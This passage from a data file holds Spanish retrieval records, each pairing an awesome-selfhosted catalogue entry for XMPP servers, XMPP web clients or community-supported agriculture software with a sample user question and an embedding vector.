Tigase β€” XMPP server implementation in Java [GPL-3.0, Java].", "indexar": "que servidor de mensajerΓ­a instantΓ‘nea puedo instalar para mi red personal?", "v": [0.17536, 0.12992, -0.09574, -0.16017, 0.01088, -0.07938, -0.07793, -0.10449, -0.02176, -0.01305, -0.06419, -0.03743, 0.04713, -0.11016, 0.02664, 0.1307, 0.13944, 0.06647, 0.13345, -0.0041, 0.08618, -0.01301, -0.07296, -0.01025, -0.00899, 0.1439, 0.08056, -0.03551, -0.04743, -0.07103, 0.04484, -0.1096, 0.06443, -0.00564, -0.02903, -0.03014, 0.03289, 0.09402, -0.04749, 0.06459, 0.14208, 0.07433, 0.00043, 0.0611, 0.07723, -0.03884, 0.09807, -0.08527, 0.02514, 0.02031, -0.04607, -0.07914, -0.11098, -0.06542, -0.05735, 5e-05, 0.22651, -0.12546, 0.06077, 0.0055, -0.05964, 0.09612, -0.06284, 0.06694, 0.08089, 0.02212, -0.0094, -0.06745, -0.15776, -0.02228, -0.03831, -0.0212, -0.04592, 0.01872, 0.01262, 0.14204, -0.1262, 0.04699, 0.02872, 0.11027, 0.03634, -0.02268, 0.0148, 0.06271, -0.03289, -0.09195, -0.0269, -0.06416, 0.07807, 0.01106, 0.11675, -0.03177, -0.03813, 0.0665, 0.08082, -0.08711, 0.02631, -0.11682, -0.03043, 0.04905, 0.02651, 0.01384, -0.02839, 0.09069, -0.01027, -0.03441, 0.04658, -0.0852, 0.1035, -0.03393, 0.05127, -0.04404, 0.05208, -0.00685, 0.02262, -0.12867, 0.02681, -0.02138, 0.01524, 0.03855, -0.11775, -0.01247, 0.0525, 0.06032, 0.02457, -0.0393, -0.04261, 0.0054, -0.00427, 0.03354, -0.03339, -0.08491, -0.00521, -0.0777, -0.02741, 0.07193, -0.02365, -0.10151, -0.01579, -0.03185, -0.02215, 0.02361, -0.08519, -0.05746, 0.04863, 0.09164, -0.03905, -0.13511, -0.03807, 0.03573, 0.10702, -0.04797, -0.07415, -0.01681, -0.04089, -0.00645, 0.0778, -0.03994, -0.02315, 0.04416, 0.02782, 0.01062, 0.03845, 0.09512, -0.01492, -0.02912, 0.01783, 0.07838, 0.0767, 0.07495, -0.0688, 0.01194, -0.0218, -0.04273, 0.00197, -0.01203, -0.0116, -0.04553, -0.01167, -0.05974, 0.03566, 0.05746, 0.03172, -0.00361, 0.00882, -0.04454, -0.05368, -0.02071, 0.02355, 0.0339, 0.0151, -0.00446, -0.06474, 0.04358, 0.0267, -0.01366, -0.05959, -0.04866, -0.0474, -0.00286, -0.04356, 0.00231, -0.07502, -0.00541, -0.02228, -0.02773, -0.04917, 0.04206, -0.00579, 0.02383, 0.01008, 0.00702, 0.10117, -0.06098, -0.03169, 0.03215, 0.12571, -0.07398, 0.04092, -0.02794, 0.02286, 0.00015, 0.00201, -0.01697, -0.05359, 0.03676, -0.011, -0.02445, 0.06616, 0.04916, -0.0494, 0.06788, -0.05308, -0.05109, 0.06406, -0.05011, 0.0252, -0.03111, -0.03332, -0.07662, 0.04037, 0.06014, -0.02954, 0.00465, -0.01451, -0.03961, -0.03553, -0.0174, -0.05868, -0.05808, -0.02395, -0.03864, 0.04533, -0.04216, -0.00749, -0.01738]} -{"tipo": "pregunta", "herramienta": "Communication - XMPP - Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - XMPP - Servers", "tema": "communication - xmpp - servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - XMPP - Servers: ejabberd β€” XMPP instant messaging server [GPL-2.0, Erlang/Docker]. MongooseIM β€” Mobile messaging platform with a focus on performance and scalability [GPL-2.0, Erlang/Docker/K8S]. Openfire β€” Real time collaboration (RTC) server [Apache-2.0, Java]. Prosody IM β€” Feature-rich and easy to configure XMPP server [MIT, Lua]. Snikket β€” All-in-one Dockerized easy XMPP solution, including web admin and clients [Apache-2.0, Docker]. Tigase β€” XMPP server implementation in Java [GPL-3.0, Java].", "indexar": "con quΓ© programa puedo montar un servicio de chat en tiempo real sin pagar licencias?", "v": [0.04763, 0.06975, -0.12969, -0.06967, -0.06476, -0.1679, -0.00028, -0.01983, -0.16753, -0.09163, 0.01677, -0.17452, 0.10322, -0.09023, 0.06553, 0.13856, 0.01185, -0.09523, 0.12814, 0.02092, 0.04408, 0.00143, -0.00224, -0.08501, -0.06108, 0.07249, 0.14497, -0.12472, -0.1246, 0.17673, 0.03729, 0.07388, 0.07431, -0.01288, 0.04099, -0.03825, 0.10811, 0.1009, 0.12284, -0.02732, 0.09745, 0.01504, 0.02817, 0.03647, 0.01118, -0.09989, 0.04004, -0.01718, -0.01467, -0.07461, 0.00615, -0.01303, -0.0373, -0.04157, 0.03165, -0.05787, 0.06158, -0.10056, 0.01407, -0.06636, -0.0597, 0.04954, 0.03463, 0.02412, 0.04095, 0.04388, 0.06426, 0.07184, -0.00408, -0.02827, -0.11523, -0.08052, 0.02625, 0.02837, -0.09393, -0.00809, -0.12985, -0.13251, 0.02368, 0.02338, 0.0616, -0.0064, 0.02172, 0.0922, -0.06286, 0.01503, 0.02227, -0.08619, 0.03739, 0.02217, 0.03719, 0.21713, 0.03752, 0.13865, 0.05904, -0.078, 0.11634, 0.05038, 0.01605, 0.03203, -0.01286, 0.06472, -0.10424, 0.0765, -0.02627, 0.07525, 0.13588, -0.10518, -0.0635, 0.02475, 0.00877, 0.06094, -0.09453, -0.02044, -0.04044, -0.03857, 0.02149, -0.0229, 0.02547, 0.03839, -0.06119, 0.0598, 0.05937, 0.00445, 0.09717, 0.00879, 0.02077, 0.13749, -0.06386, -0.00118, -0.03131, -0.00279, -0.0204, -0.04523, -0.02189, -0.01167, 0.02854, 0.02442, -0.03386, -0.03938, 0.04841, 0.0414, 0.00114, 0.0119, 0.03241, 0.04324, -0.08871, -0.14062, -0.05932, -0.02875, 0.05595, 0.05048, 0.03877, 0.11647, -0.06608, -0.02528, 0.00182, -0.03467, 0.00857, 0.07714, 0.0422, 0.0661, -0.04958, -0.07758, 0.03826, -0.00343, 0.00643, 0.0655, 0.07856, 0.05042, -0.03326, 0.01835, 0.07818, -0.02117, 0.04401, 0.05218, -0.02518, -0.08081, -0.02425, -0.0465, -0.07347, -0.00921, 0.02253, -0.03091, -0.03043, 0.04268, -0.05413, 0.07384, 0.00491, -0.01437, -0.00742, -0.02316, 0.03105, 0.0251, 0.01385, -0.0386, -0.01047, 0.02002, -0.03888, -0.06048, -0.04159, -0.01325, -0.00633, 0.04081, 0.02666, -0.00219, 0.00844, 0.11467, 0.03197, 0.06334, -0.03466, -0.01796, 0.04321, 0.00153, -0.02425, 0.02302, 0.02219, -0.02787, -0.03047, 0.04836, 0.03627, -0.02302, 0.01589, 0.05977, -0.00495, -0.05636, 0.04951, 0.09988, 0.04949, 0.02532, -0.05446, -0.00452, -0.03747, -0.02912, 0.0276, -0.0113, 0.04661, -0.00406, -0.02712, -0.05889, -0.01122, 0.08987, 0.01555, -0.00046, -0.03268, -0.00264, -0.07311, -0.04812, -0.00934, -0.00227, -0.00412, 0.08984, 0.02862, -0.0256, 0.04516, -0.00853]} -{"tipo": "pregunta", "herramienta": "Communication - XMPP - Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - XMPP - Servers", "tema": "communication - xmpp - servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - XMPP - Servers: ejabberd β€” XMPP instant messaging server [GPL-2.0, Erlang/Docker]. MongooseIM β€” Mobile messaging platform with a focus on performance and scalability [GPL-2.0, Erlang/Docker/K8S]. Openfire β€” Real time collaboration (RTC) server [Apache-2.0, Java]. Prosody IM β€” Feature-rich and easy to configure XMPP server [MIT, Lua]. Snikket β€” All-in-one Dockerized easy XMPP solution, including web admin and clients [Apache-2.0, Docker]. Tigase β€” XMPP server implementation in Java [GPL-3.0, Java].", "indexar": "existe alguna soluciΓ³n todo en uno basada en Docker que no requiera configuraciΓ³n compleja?", "v": [-0.00566, 0.18658, -0.19372, 0.12579, 0.02299, -0.13715, 0.10373, -0.00631, -0.15472, -0.18971, -0.06211, -0.11641, -0.04181, -0.13946, 0.06853, -0.2675, 0.02135, -0.07964, 0.01529, -0.01481, -0.01968, -0.0959, -0.03196, -0.06847, -0.11337, -0.00786, 0.00753, -0.0731, -0.14753, 0.017, -0.0242, -0.01216, 0.02531, 0.06054, -0.06914, 0.09931, -0.03677, -0.10168, 0.03253, 0.06046, 0.07378, -0.01364, 0.00136, 0.05779, 0.00265, 0.07837, -0.01587, 0.01197, -0.02528, -0.02436, 0.04077, 0.08969, -0.0423, -0.03845, 0.00643, -0.03853, 0.1985, -0.01517, 0.08568, 0.00848, -0.11583, -0.05997, 0.01979, -0.05242, 0.09538, -0.02821, 0.0007, -0.05519, 0.07724, 0.01762, -0.04878, 0.03066, 0.00663, -0.04443, 0.04969, 0.03492, 0.02394, -0.00962, 0.04873, 0.10876, 0.0763, 0.02669, -0.12225, -0.01964, -0.09052, -0.06958, 0.1039, -0.09213, 0.02395, -0.04965, -0.02407, -0.08241, 0.00733, 0.0691, 0.06489, -0.14434, 0.00367, 0.11157, 0.00102, 0.00854, 0.09709, 0.07143, -0.00156, 0.02384, -0.0536, -0.05995, 0.12228, -0.06466, 0.0551, -0.02413, -0.04177, 0.04845, 0.01452, -0.10009, -0.07391, -0.05008, 0.02819, 0.07736, -0.08848, -0.03541, -0.02313, 0.02612, 0.02778, 0.02937, 0.03064, 0.01016, 0.02242, 0.05796, 0.02468, 0.02564, -0.05741, -0.13275, -0.04623, -0.03511, -0.03472, 0.03253, -0.05952, -0.06612, -0.04002, -0.02782, 0.01769, 0.02105, 0.00491, -0.0725, 0.03481, 0.00189, 0.03701, -0.02585, -0.02243, 0.07992, -0.06939, 0.02194, 0.08229, 0.02917, -0.06122, 0.03234, 0.04074, 0.0186, 0.04791, 0.09865, 0.00393, -0.07336, -0.04691, -0.0095, -0.0111, -0.04838, -0.06619, -0.01881, -0.02165, 0.07714, -0.06842, -0.04936, 0.00216, -0.0613, -0.0102, 0.06016, 0.0352, -0.06898, 0.01155, 0.02023, 0.07052, -0.06188, 0.0684, 0.03841, 0.02291, -0.0585, -0.01556, 0.0202, -0.08538, -0.065, 0.06396, -0.04634, -0.02304, -0.05641, 0.08126, -0.01981, 0.01543, -0.11068, -0.04477, 0.02239, -0.03614, 0.0198, -0.05544, 0.01703, -0.03794, 0.10324, -0.09483, 0.06506, 0.04643, -0.0165, -0.01504, 0.02445, -0.04517, 0.01276, -0.02475, -0.0, 0.03482, 0.01705, 0.04547, -0.01028, -0.00779, 0.02466, 0.01684, 0.04738, 0.01999, 0.01854, 0.0151, 0.03638, -0.01698, -0.00104, 0.04598, -0.01331, 0.05028, 0.04047, -0.02533, 0.01962, -0.01937, -0.05765, 0.02736, 0.02981, 0.01846, 0.04151, 0.0513, -0.03615, 0.04039, 0.0124, -0.07542, 0.00448, -0.01238, -0.00705, 0.00614, 0.04737, 0.03034, 0.03671, -0.01459, -0.02033]} -{"tipo": "pregunta", "herramienta": "Communication - XMPP - Web Clients", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - XMPP - Web Clients", "tema": "communication - xmpp - web clients", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - XMPP - Web Clients: Converse.js β€” XMPP chat client in your browser [MPL-2.0, Javascript]. Libervia β€” Web frontend from Salut Γ  Toi [AGPL-3.0, Python]. Salut Γ  Toi β€” Multipurpose, multi frontend, libre and decentralized communication tool [AGPL-3.0, Python].", "indexar": "que programa hay para chatear por XMPP en el navegador?", "v": [0.07001, -0.06067, -0.0405, -0.04689, -0.14046, -0.10787, 0.09897, 0.02419, -0.01103, -0.04028, 0.09505, 0.09675, -0.02032, -0.11217, -0.13937, 0.09823, -0.0321, -0.02142, 0.13704, 0.02626, 0.01755, 0.10705, -0.02565, -0.09719, -0.07686, 0.11895, -0.06548, -0.00526, -0.03836, 0.01017, -0.02591, -0.03131, -0.03011, 0.0277, 0.01023, 0.00551, 0.12108, -0.09288, -0.01807, 0.06436, 0.01418, -0.10136, -0.03676, 0.11615, 0.12323, 0.076, -0.03289, -0.03533, -0.01568, -0.10677, 0.01272, 0.06532, -0.12027, 0.08782, 0.01325, 0.01936, 0.04649, -0.12682, 0.02368, -0.14063, 0.08993, 0.07516, 0.01016, -0.06688, -0.00672, -0.04027, 0.0078, -0.05914, -0.02673, 0.03236, -0.03769, -0.08709, 0.06543, 0.04714, 0.01675, 0.01613, 0.04597, -0.03674, 0.12593, 0.06041, 0.06684, -0.06744, -0.0936, 0.03771, -0.03813, -0.04988, 0.04249, -0.03573, -0.01177, -0.0535, 0.13567, 0.12882, 0.00792, 0.1333, 0.02167, -0.19743, 0.1796, 0.01046, 0.05936, 0.03302, 0.07379, 0.00412, -0.11832, 0.03498, -0.04413, -0.02075, 0.1015, -0.03344, 0.0184, 0.04235, 0.05189, -0.01041, -0.04229, -0.0556, -0.00682, -0.03069, 0.00484, -0.05503, -0.03247, -0.1106, -0.10235, 0.07249, -0.15563, 0.04034, 0.06788, -0.03275, 0.01441, 0.05102, 0.06819, 0.00601, 0.08389, -0.06245, -0.04948, 0.03324, -0.08504, 0.03144, 0.0516, 0.03443, 0.01065, -0.02912, 0.0263, 0.0167, 0.02083, 0.01384, 0.02848, 0.0532, -0.01978, -0.02756, -0.00425, -0.00108, 0.05263, 0.01524, 0.03611, 0.04606, -0.04345, 0.00568, -0.04168, 0.06356, 0.04749, 0.06119, -0.09344, -0.05217, 0.06455, 0.00225, 0.06495, -0.0209, -0.01006, 0.07877, 0.12312, 0.05647, -0.04454, 0.10189, 0.0714, -0.11593, 0.01208, -0.02106, -0.03738, -0.1037, 0.08117, 0.00777, -0.05129, -0.04174, 0.0354, 0.03151, -0.08109, -0.03218, -0.06237, 0.04955, -0.03894, -0.0696, -0.07241, -0.00417, -0.02683, 0.0211, 0.07527, -0.0597, -0.03494, 0.01778, 0.02044, -0.06229, -0.01073, -0.01105, 0.06558, -0.02751, 0.02216, 0.06254, -0.0141, -0.06167, 0.0184, 0.10504, -0.00824, -0.04269, 0.05277, 0.0637, -0.01902, 0.00866, 0.0395, 0.04514, -0.0134, 0.0296, -0.03866, -0.05466, 0.02681, 0.00697, 0.04944, -0.04176, 0.05092, 0.01798, 0.01993, 0.01692, -0.04214, -0.07487, -0.02039, -0.03635, 0.0545, 0.03104, -0.07087, -0.00333, -0.01047, -0.09697, -0.02952, 0.06571, 0.00535, -0.11104, -0.02861, -0.00565, -0.07052, 0.03435, 0.08402, -0.01492, -0.00509, 0.02223, -0.00514, -0.03979, 0.00486, 0.08503]} -{"tipo": "pregunta", "herramienta": "Communication - XMPP - Web Clients", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - XMPP - Web Clients", "tema": "communication - xmpp - web clients", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - XMPP - Web Clients: Converse.js β€” XMPP chat client in your browser [MPL-2.0, Javascript]. Libervia β€” Web frontend from Salut Γ  Toi [AGPL-3.0, Python]. Salut Γ  Toi β€” Multipurpose, multi frontend, libre and decentralized communication tool [AGPL-3.0, Python].", "indexar": "cual es una alternativa libre a WhatsApp para grupos grandes?", "v": [-0.07815, 0.06291, -0.03228, 0.01924, -0.23949, -0.01284, -0.00247, -0.07053, -0.05124, -0.04772, -0.04073, -0.1869, -0.05074, 0.14738, 0.02553, 0.06832, -0.00222, -0.06414, 0.08519, 0.02074, -0.03626, -0.06211, -0.07442, -0.14718, -0.13391, -0.06555, 0.0032, 0.02908, -0.06665, 0.08332, 0.05852, -0.06092, -0.04253, -0.04509, -0.0564, 0.08012, 0.09371, 0.07212, 0.03306, -0.00098, -0.0001, -0.03543, -0.11515, 0.05613, 0.03625, 0.01992, -0.10358, 0.0426, 0.05081, 0.02788, -0.01715, 0.08751, 0.02673, 0.11284, -0.00506, -0.03612, 0.18077, -0.11367, -0.02898, 0.07695, -0.09231, 0.13805, -0.0318, 0.01049, 0.1261, 0.07737, -0.06916, 0.06107, -0.04338, 0.13408, 0.06655, -0.06378, -0.01659, 0.03546, -0.01061, 0.06864, -0.14041, 0.0449, -0.07774, -0.00286, 0.09474, 0.03348, 0.11553, -0.02383, 0.00927, -0.04978, 0.0631, -0.00924, 0.00463, 0.04822, 0.06696, 0.07322, 0.00303, 0.12189, 0.06068, -0.11168, -0.00661, 0.079, 0.01184, 0.0323, 0.07664, -0.07128, -0.06042, 0.00767, 0.00977, 0.03992, -0.04045, 0.0455, -0.03384, 0.00413, -0.00468, 0.03928, 0.05213, 0.10755, 0.0637, -0.10052, -0.00173, 0.05911, 0.02065, -0.05157, -0.03494, 0.01975, -0.09619, -0.05854, 0.03407, 0.08023, 0.05938, 0.10388, -0.05306, 0.09482, 0.05307, -0.03397, -0.07076, -0.05862, -0.14605, -0.01512, 0.01515, 0.03061, 0.0784, 0.00181, 0.03576, -0.01117, 0.0235, -0.13912, 0.0159, 0.01087, 0.03445, -0.09037, -0.01529, 0.06616, -0.02311, 0.03948, -0.11661, 0.11094, -0.01455, -0.03346, -0.07475, -0.05747, -0.01222, 0.07517, -0.02704, -0.0513, 0.03031, -0.01579, 0.00047, -0.02573, 0.04999, -0.05102, -0.04346, -0.03693, 0.02798, 0.00644, 0.1113, -0.08568, 0.01536, -0.03621, -0.00588, -0.03554, 0.06673, -0.05686, 0.02032, 0.02343, 0.01705, -0.06028, 0.01741, -0.01444, -0.08794, 0.0469, 0.00088, 0.07063, -0.11432, 0.05235, -0.049, -0.07276, -0.01296, -0.01025, -0.0439, -0.08439, 0.0111, -0.05012, -0.01809, -0.03474, -0.01053, 0.03218, -0.04988, -0.021, -0.02276, 0.01534, 0.0463, 0.06077, 0.0215, 0.02166, 0.04446, 0.03664, -0.08728, -0.00279, 0.02233, -0.01819, 0.03147, 0.07234, -0.02794, 0.04722, 0.08349, 0.02929, 0.03965, 0.04177, -0.02723, 0.00905, -0.04381, 0.01706, 0.033, -0.00439, -0.02615, 0.00333, 0.08331, -0.0486, 0.05015, 0.01899, -0.0245, 0.01212, 0.05929, 0.03242, 0.01153, 0.04176, -0.04551, -0.00433, -0.11933, 0.01244, -0.04296, -0.04477, 0.00117, 0.0337, 0.03897, 0.00169, 0.08436, -0.02316]} -{"tipo": "pregunta", "herramienta": "Communication - XMPP - Web Clients", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - XMPP - Web Clients", "tema": "communication - xmpp - web clients", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - XMPP - Web Clients: Converse.js β€” XMPP chat client in your browser [MPL-2.0, Javascript]. Libervia β€” Web frontend from Salut Γ  Toi [AGPL-3.0, Python]. Salut Γ  Toi β€” Multipurpose, multi frontend, libre and decentralized communication tool [AGPL-3.0, Python].", "indexar": "con que puedo montar un sistema de mensajerΓ­a descentralizado en casa?", "v": [0.0345, 0.07561, -0.06641, -0.09852, -0.20783, -0.06096, -0.06036, 0.03184, -0.12055, -0.13208, -0.10931, -0.02668, 0.07017, -0.05028, 0.01012, 0.0839, 0.07678, 0.07319, 0.02696, -0.04901, 0.03571, -0.10069, -0.05565, -0.04109, -0.02948, 0.09135, 0.0548, -0.1198, -0.11645, 0.09734, 0.09048, -0.01602, 0.10803, 0.02064, -0.01033, -0.02261, 0.04198, 0.01242, 0.00841, -0.02447, 0.08614, 0.04478, -0.0381, 0.00415, 0.01223, -0.07632, 0.09939, -0.10158, -0.0001, -0.07069, -0.11594, -0.11248, -0.1495, 0.00521, -0.0286, -0.04581, 0.12224, -0.00384, 0.12665, -0.07855, 0.02272, 0.11904, 0.01014, 0.04997, 0.01992, -0.02664, -0.07074, -0.04864, -0.11576, 0.00159, 0.08468, -0.05392, 0.03722, 0.05003, -0.06381, 0.06429, -0.09551, 0.01021, 0.00863, 0.07157, 0.0438, -0.05822, -0.04015, 0.03281, 0.07208, -0.05527, -0.04925, -0.08888, 0.02948, -0.08056, 0.04608, -0.01279, 0.01997, 0.09767, 0.0957, -0.1269, -0.02309, -0.02437, -0.0587, 0.04397, 0.00524, -0.06895, -0.00282, 0.18479, 0.03644, -0.13474, 0.11016, -0.05208, 0.08982, -0.08906, -0.0373, 0.06139, 0.03182, 0.01054, -0.07964, -0.08503, -0.03369, 0.08113, 0.01107, -0.05086, -0.09308, 0.09672, 0.09283, -0.02801, 0.01962, -0.00606, 0.12812, 0.01934, 0.02481, 0.10591, -0.00279, -0.07651, -0.05211, -0.03095, 0.05073, 0.01708, -0.09535, 0.00676, 0.02486, 0.07821, -0.01594, 0.08315, -0.01257, -0.10398, 0.07767, 0.08315, 0.02132, -0.11597, -0.06554, 0.0451, 0.01776, 0.1089, -0.03085, -0.07495, 0.02356, -0.02043, 0.06752, -0.04678, 0.03019, 0.04989, -0.00783, 0.0702, -0.07218, 0.01548, -0.0399, 0.03155, 0.03903, 0.044, 0.00737, 0.02981, -0.07082, 0.02533, 0.06568, -0.00095, 0.0277, 0.01404, -0.01751, -0.03793, -0.04889, -0.04913, -0.03204, 0.10736, 0.00977, -0.00326, 0.0568, 0.1141, -0.0674, 0.05252, 0.04339, 0.02436, -0.04396, -0.00724, -0.05822, 0.08536, -0.00592, -0.03477, -0.09595, -0.02504, 0.03821, 0.03757, -0.05168, -0.04142, 0.08284, -0.00166, -0.08919, 0.02968, -0.01916, 0.03047, 0.03113, 0.07731, 0.0272, -0.01827, 0.08078, -0.04486, -0.02011, 0.04519, -0.00199, -0.00909, 0.00726, 0.056, 0.0402, 0.03736, 0.00422, -0.02756, -0.03414, 0.0156, -0.01351, 0.03095, 0.05154, 0.02756, -0.05052, -0.03891, 0.05431, 0.04502, 0.05452, -0.04443, -0.0061, -0.03601, 0.01104, -0.0335, -0.00608, 0.0737, 0.02621, 0.0722, 0.00433, -0.04997, -0.06304, -0.0093, -0.03781, -0.04115, -0.03658, -0.0139, -0.01846, -0.01935, 0.00338, -0.03104]} -{"tipo": "pregunta", "herramienta": "Community-Supported Agriculture (CSA)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Community-Supported Agriculture (CSA)", "tema": "community-supported agriculture (csa)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Community-Supported Agriculture (CSA): ACP Admin β€” CSA administration. Manage members, subscriptions, deliveries, drop-off locations, member participation, invoices and emails (documentation in French) [MIT, Ruby]. FoodCoopShop β€” User-friendly software for food-coops [AGPL-3.0, PHP/Docker]. Foodsoft β€” Manage a non-profit food coop (product catalog, ordering, accounting, job scheduling) [AGPL-3.0, Docker/Ruby]. Hive-Pal β€” Mobile-first beekeeping management app for tracking hives, inspections, queen records, and equipment with streamlined data entry optimized for field use [MIT, Nodejs/Docker]. juntagrico β€” Management platform for community gardens and vegetable cooperatives [LGPL-3.0, Python]. Open Food Network β€” Online marketplace for local food. It enables a network of independent online food stores that connect farmers and food hubs with individuals and local businesses [AGPL-3.0, Ruby]. OpenOlitor β€” Administration platform for Community Supported Agriculture groups [AGPL-3.0, Scala].", "indexar": "quΓ© programa puedo usar para administrar miembros y entregas de una cooperativa de alimentos", "v": [0.02056, -0.01529, -0.02595, -0.17298, -0.00324, -0.02763, 0.0905, 0.11035, -0.22159, -0.11882, -0.17124, -0.07152, 0.0713, -0.06318, -0.00064, -0.05099, 0.22488, 0.00501, 0.03154, 0.06715, 0.08741, 0.11363, -0.03518, -0.01992, -0.09858, 0.05785, 0.14983, -0.00355, 0.00309, 0.0859, 0.08102, -0.06305, 0.06275, -0.01883, -0.0527, 0.04242, -0.11167, -0.01991, 0.02184, -0.01364, -0.0014, -0.03188, -0.04992, -0.1442, 0.02989, 0.05815, -0.06228, -0.03668, -0.00979, 0.00363, 0.00059, -0.03692, -0.05068, -0.07705, -0.02534, 0.06328, 0.00693, -0.16483, 0.0134, 0.10389, 0.00893, 0.0122, 0.07182, -0.08248, -0.0298, -0.0233, -0.11436, -0.04878, -0.0453, 0.0653, 0.01689, 0.09133, 0.02572, -0.08636, -0.06147, 0.09057, -0.02279, 0.06894, 0.01408, -0.07589, 0.09907, -0.05145, 0.06848, 0.07566, -0.00569, -0.14412, 0.07235, -0.04498, 0.01623, -0.08521, 0.08251, 0.02451, 0.07549, 0.02342, 0.05921, -0.00506, -0.02719, 0.04748, 0.00366, 0.09076, 0.02245, -0.0462, -0.08661, 0.09046, -0.05571, -0.00316, 0.09056, -0.04102, -0.03311, -0.02929, 0.03014, 0.02385, -0.07121, -0.10969, -0.04288, 0.09833, -0.10362, -0.00991, 0.04296, -0.03652, -0.06343, 0.06754, -0.00224, 0.07659, 0.17096, -0.00921, 0.01379, 0.145, 0.00654, 0.04739, -0.09037, 0.09554, 0.03007, -0.09294, -0.00328, -0.11596, -0.01365, -0.02381, -0.01494, -0.06963, -0.05879, -0.00413, 0.02724, -0.05427, 0.03366, -0.01369, -0.09044, -0.06249, 0.02612, 0.04121, -0.00776, 0.05308, -0.0011, -0.01016, -0.06371, -0.01874, -0.01796, -0.02561, -0.05684, 0.00809, 0.01716, -0.02009, -0.09777, -0.00359, -0.0166, -0.08652, 0.05278, 0.05125, 0.05789, 0.02826, -0.01675, 0.0612, -0.02968, 0.03315, 0.02259, -0.02346, -0.05852, -0.0451, 0.0119, 0.00768, -0.11375, 0.06038, 0.01369, 0.02659, 0.02814, -0.03163, -0.01352, 0.10021, 0.06242, 0.0646, 0.05012, 0.02508, 0.01797, -0.02974, -0.06466, 0.0663, -0.03304, -0.01469, 0.03225, -0.03554, -0.00279, -0.00903, -0.00515, -0.01963, 0.0216, -0.00038, -0.07228, 0.06317, 0.04798, 0.05959, 0.09273, -0.01207, 0.07948, -0.01626, -0.02863, -0.03651, -0.01155, 0.02133, -0.0315, 0.04771, -0.0915, -0.0298, 0.02495, 0.04253, 0.06883, -0.00486, 0.00292, 0.09778, 0.03565, 0.00784, -0.02964, 0.0402, 0.00555, 0.00492, 0.01832, -0.01946, 0.03819, -0.01266, -0.02993, -0.04171, -0.05484, 0.1094, -0.046, -0.00155, -0.02478, -0.02827, -0.05632, 0.06652, -0.061, 0.00297, -0.04851, -0.00295, 0.08189, -0.03016, 0.0158, 0.05625]} -{"tipo": "pregunta", "herramienta": "Community-Supported Agriculture (CSA)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Community-Supported Agriculture (CSA)", "tema": "community-supported agriculture (csa)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Community-Supported Agriculture (CSA): ACP Admin β€” CSA administration. Manage members, subscriptions, deliveries, drop-off locations, member participation, invoices and emails (documentation in French) [MIT, Ruby]. FoodCoopShop β€” User-friendly software for food-coops [AGPL-3.0, PHP/Docker]. Foodsoft β€” Manage a non-profit food coop (product catalog, ordering, accounting, job scheduling) [AGPL-3.0, Docker/Ruby]. Hive-Pal β€” Mobile-first beekeeping management app for tracking hives, inspections, queen records, and equipment with streamlined data entry optimized for field use [MIT, Nodejs/Docker]. juntagrico β€” Management platform for community gardens and vegetable cooperatives [LGPL-3.0, Python]. Open Food Network β€” Online marketplace for local food. It enables a network of independent online food stores that connect farmers and food hubs with individuals and local businesses [AGPL-3.0, Ruby]. OpenOlitor β€” Administration platform for Community Supported Agriculture groups [AGPL-3.0, Scala].", "indexar": "con quΓ© software puedo gestionar un huerto comunitario o un cooperative de verduras", "v": [0.18427, -0.03569, -0.14171, -0.09489, -0.0449, -0.04211, 0.08704, -0.00525, 0.02999, -0.23533, -0.14262, 0.01055, -0.01286, 0.04221, 0.08528, 0.00621, 0.18085, -0.15194, -0.02453, 0.07745, -0.03219, 0.00696, 0.09835, -0.01625, -0.1027, -0.05377, 0.05277, -0.00329, -0.02231, 0.07247, 0.08491, 0.0435, 0.02747, -0.00401, -0.13802, 0.02202, -0.01682, 0.009, -0.01501, -0.13175, -0.07491, 0.09043, -0.03564, -0.06965, -0.03287, 0.05368, -0.0397, -0.22453, 0.03138, -0.0498, -0.05529, -0.10793, -0.00928, -0.05853, 0.10686, 0.08615, 0.00012, -0.04373, 0.04002, -0.03177, -0.06879, 0.10397, 0.03901, -0.04521, -0.08118, 0.04327, -0.01726, 0.05499, -0.05077, 0.0698, 0.02577, 0.11862, 0.04493, -0.08964, -0.12189, 0.04837, 0.00488, 0.0511, -0.0544, -0.00343, 0.04301, 0.06048, 0.10563, 0.00304, -0.01263, -0.10022, 0.05254, -0.06992, 0.05221, -0.04458, 0.09162, 0.03477, -0.06314, 0.00243, 0.03333, 0.03573, 0.01212, 0.0954, -0.04205, 0.08981, -0.05819, -0.05941, -0.10739, 0.02998, -0.05134, 0.07386, -0.02547, 0.0203, -0.07384, 0.03962, 0.05587, 0.08165, 0.08132, -0.12592, 0.06649, 0.04683, -0.07152, -0.01982, 0.04655, -0.01134, -0.01845, -0.00702, 0.03144, 0.00697, 0.11859, -0.03071, -0.01993, 0.10099, -0.02711, 0.04086, -0.16122, 0.02247, 0.03853, -0.03716, 0.02512, 0.04662, 0.02044, -0.03683, -0.05797, -0.04246, -0.07537, 0.03098, -0.0043, -0.06718, 0.06701, -0.04643, -0.03937, -0.03097, 0.01581, -0.02468, 0.0788, -0.00994, -0.00779, 0.03018, -0.0932, 0.013, -0.02136, -0.03142, -0.04373, 0.05701, -0.05043, 0.03389, -0.04965, 0.00358, -0.01277, -0.07882, 0.08839, -0.00161, 0.07551, 0.00814, -0.05841, 0.0063, -0.04165, 